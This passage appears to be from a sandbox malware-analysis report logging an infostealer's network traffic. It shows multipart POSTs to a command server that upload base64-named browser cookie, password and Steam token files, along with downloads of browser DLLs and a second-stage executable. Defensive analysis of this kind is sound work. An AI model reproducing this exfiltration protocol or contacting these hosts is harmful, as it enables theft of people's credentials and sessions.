41 2d 2d 0d 0a Data Ascii: ------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="hwid"07D1E341B17A2974164258-a33c7340-61ca------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------KEHDHIDAEHCFHJJJJECA--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGHJKJKKJDHIDHJKJDBHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 42 2d 2d 0d 0a Data Ascii: ------AEGHJKJKKJDHIDHJKJDBContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------AEGHJKJKKJDHIDHJKJDBContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------AEGHJKJKKJDHIDHJKJDBContent-Disposition: form-data; name="mode"1------AEGHJKJKKJDHIDHJKJDB--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDGHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 2d 2d 0d 0a Data Ascii: ------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="mode"2------IJDHDGDAAAAKFIDGHJDG--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGIECGIEBKJJJJKEGHJHost: 147.45.68.138Content-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 2d 2d 0d 0a Data Ascii: ------JDGIECGIEBKJJJJKEGHJContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------JDGIECGIEBKJJJJKEGHJContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------JDGIECGIEBKJJJJKEGHJContent-Disposition: form-data; name="mode"21------JDGIECGIEBKJJJJKEGHJ--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIDHDGCBFBKECBFHCAFHHost: 147.45.68.138Content-Length: 8173Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sql.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBGHIIDAECBFIDHIIDGHost: 147.45.68.138Content-Length: 829Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 51 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4e 7a 59 31 4e 44 45 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 55 74 4d 44 63 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 31 4e 7a 51 77 43 55 35 4a 52 41 6b 31 4d 54 45 39 62 6b 35 68 5a 48 46 58 4f 58 56 55 59 31 6b 77 54 31 41 32 53 54 4e 68 5a 6d 35 79 4e 7a 46 76 4e 6b 56 36 59 56 6c 4d 63 32 52 77 56 7a 52 56 52 56 6c 4f 4d 33 5a 5a 63 56 39 79 59 6c 4a 79 54 6b 5a 34 54 54 46 71 62 33 70 51 52 33 56 6f 61 6b 39 53 51 6c 70 4c 53 30 31 36 4d 6e 52 6b 52 48 42 57 5a 54 64 6b 54 6e 56 55 56 33 41 30 51 33 6c 4c 4c 58 70 30 4e 55 6c 7a 4e 6e 64 57 52 57 78 32 5a 56 64 42 5a 6b 74 52 5a 33 64 4f 53 6d 6c 4c 53 33 52 59 53 45 4e 44 51 32 31 79 62 47 64 36 57 6c 52 73 4e 55 4e 70 53 32 70 55 5a 55 45 79 61 56 46 78 5a 6a 5a 36 62 46 4a 4c 4d 6d 67 34 64 32 63 78 61 46 5a 77 53 58 4e 58 63 32 46 4c 63 57 46 58 53 6e 6c 49 54 56 42 47 4d 30 70 42 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 2d 2d 0d 0a Data Ascii: ------JDBGHIIDAECBFIDHIIDGContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------JDBGHIIDAECBFIDHIIDGContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------JDBGHIIDAECBFIDHIIDGContent-Disposition: form-data; name="file_name"Q29va2ll
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJKKFIJKFCAKJJJKJKFIHost: 147.45.68.138Content-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4b 4b 46 49 4a 4b 46 43 41 4b 4a 4a 4a 4b 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4b 46 49 4a 4b 46 43 41 4b 4a 4a 4a 4b 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4b 46 49 4a 4b 46 43 41 4b 4a 4a 4a 4b 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4b 46 49 4a 4b 46 43 41 4b 4a 4a 4a 4b 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4b 46 49 4a 4b 46 43 41 4b 4a 4a 4a 4b 4a 4b 46 49 2d 2d 0d 0a Data Ascii: ------HJKKFIJKFCAKJJJKJKFIContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------HJKKFIJKFCAKJJJKJKFIContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------HJKKFIJKFCAKJJJKJKFIContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------HJKKFIJKFCAKJJJKJKFIContent-Disposition: form-data; name="file_data"------HJKKFIJKFCAKJJJKJKFI--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDGHost: 147.45.68.138Content-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 2d 2d 0d 0a Data Ascii: ------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="file_data"------JKFIDGDHJEGIEBFHDGDG--
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIIJJJKEGIDGCBAFIJHost: 147.45.68.138Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDGHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 2d 2d 0d 0a Data Ascii: ------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="mode"3------JKFIDGDHJEGIEBFHDGDG--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEGDAKEHJDHIDHJJDAEHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 34 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 2d 2d 0d 0a Data Ascii: ------AKEGDAKEHJDHIDHJJDAEContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------AKEGDAKEHJDHIDHJJDAEContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------AKEGDAKEHJDHIDHJJDAEContent-Disposition: form-data; name="mode"4------AKEGDAKEHJDHIDHJJDAE--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBFIIEBGCAKKEBFBAAFHost: 147.45.68.138Content-Length: 457Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 55 32 39 6d 64 46 78 54 64 47 56 68 62 56 78 7a 64 47 56 68 62 56 39 30 62 32 74 6c 62 6e 4d 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 4e 2b 64 41 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 2d 2d 0d 0a Data Ascii: ------JDBFIIEBGCAKKEBFBAAFContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------JDBFIIEBGCAKKEBFBAAFContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------JDBFIIEBGCAKKEBFBAAFContent-Disposition: form-data; name="file_name"U29mdFxTdGVhbVxzdGVhbV90b2tlbnMudHh0------JDBFIIEBGCAKKEBFBAAFContent-Disposition: form-data; name="file_data"N+dA------JDBFIIEBGCAKKEBFBAAF--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDGHIJDGCBAAAAAFIJDHost: 147.45.68.138Content-Length: 98233Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBGDGIDBAAEBFHJKJDGHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 42 47 44 47 49 44 42 41 41 45 42 46 48 4a 4b 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 47 44 47 49 44 42 41 41 45 42 46 48 4a 4b 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 47 44 47 49 44 42 41 41 45 42 46 48 4a 4b 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 47 44 47 49 44 42 41 41 45 42 46 48 4a 4b 4a 44 47 2d 2d 0d 0a Data Ascii: ------BFBGDGIDBAAEBFHJKJDGContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------BFBGDGIDBAAEBFHJKJDGContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------BFBGDGIDBAAEBFHJKJDGContent-Disposition: form-data; name="mode"5------BFBGDGIDBAAEBFHJKJDG--
Source: global traffic	HTTP traffic detected: GET /prog/66cf818156193_ldjfnsfd.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIDGHDBAFIJJJJKJDHDHost: 147.45.68.138Content-Length: 499Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 44 47 48 44 42 41 46 49 4a 4a 4a 4a 4b 4a 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 44 47 48 44 42 41 46 49 4a 4a 4a 4a 4b 4a 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 44 47 48 44 42 41 46 49 4a 4a 4a 4a 4b 4a 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 44 47 48 44 42 41 46 49 4a 4a 4a 4a 4b 4a 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 